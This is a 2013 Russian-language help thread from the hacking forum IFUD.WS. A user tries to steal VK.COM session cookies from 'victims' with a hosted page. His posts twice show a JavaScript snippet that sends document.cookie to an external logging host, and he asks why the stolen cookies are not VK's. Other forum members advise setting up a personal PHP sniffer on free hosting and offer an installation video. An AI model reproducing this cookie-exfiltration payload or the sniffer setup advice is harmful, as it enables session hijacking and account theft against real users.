1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Проблема с сниффером

Тема в разделе "Помощь по всем вопросам.", создана пользователем Алексей1, 14 май 2013.

1. TopicStarter Overlay
    Алексей1

Алексей1

Симпатии:
    20
    Вчера прочитал статью "Обход системы защиты VK.COM [Ссылка на вредоносный сайт] (By EEjester)" Всё понял,сделал как там написано.Пользуюсь Please login or register to view links В результате от жертвы приходят просто
    AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
    Решил изменить index.html вписал туда:
    <script>
    img = new Image(); img.src = "Please login or register to view links"+document.cookie;
    </script>
    Снова пробую перехожу по ссылке,и всё ок в логе есть инфа,вроде бы нормально,но приходят странные результаты
    s_i=1; s_order=asc; statSuSid=0.07149693019135708
    Что это за результат?? Почему когда я ввожу вручную javascript в адресную строку,то мне нормальные результаты приходят emixlang=; remixdt=; remixtst=; remixsid=; remixrefkey=; remixseenads=0; remixflash= ????

Метки:
  2. EEjester

EEjester hack_the_god

Симпатии:
    941
    юзай свой снифер... поставь какойнить на .php на бесплатный хостинг и норм.

3. ResH

ResH Команда форума

Симпатии:
    2.271
    я же давал тебе ссылку на сниф , будет время вечером сниму видео как установить свой сниф

• Like Like x 1
  4. TopicStarter Overlay
    Алексей1

Алексей1

Симпатии:
    20
    Буду ждать..))
    --- добавлено: 14 май 2013 в 14:05 ---
    Так я так и сделал зарегался на .h16.ru (там есть поддержка PHP) создал сайт Please login or register to view links. Качнул FileZilla,удалил всё полностью до коренной папки и закинул index в котором содержится:
    <script>
    img = new Image(); img.src = "Please login or register to view links"+document.cookie;
    </script>
    Опробовал,всё работает,перенаправляет на Please login or register to view links.Приходят логи,но они не такие какие-то
    --- добавлено: 14 май 2013 в 14:06 ---
    И ещё ВК не блокирует Please login or register to view links

5. TopicStarter Overlay
    Алексей1

Алексей1

Симпатии:
    20
    Может я что-то не так делаю??

Поделиться этой страницей

Загрузка...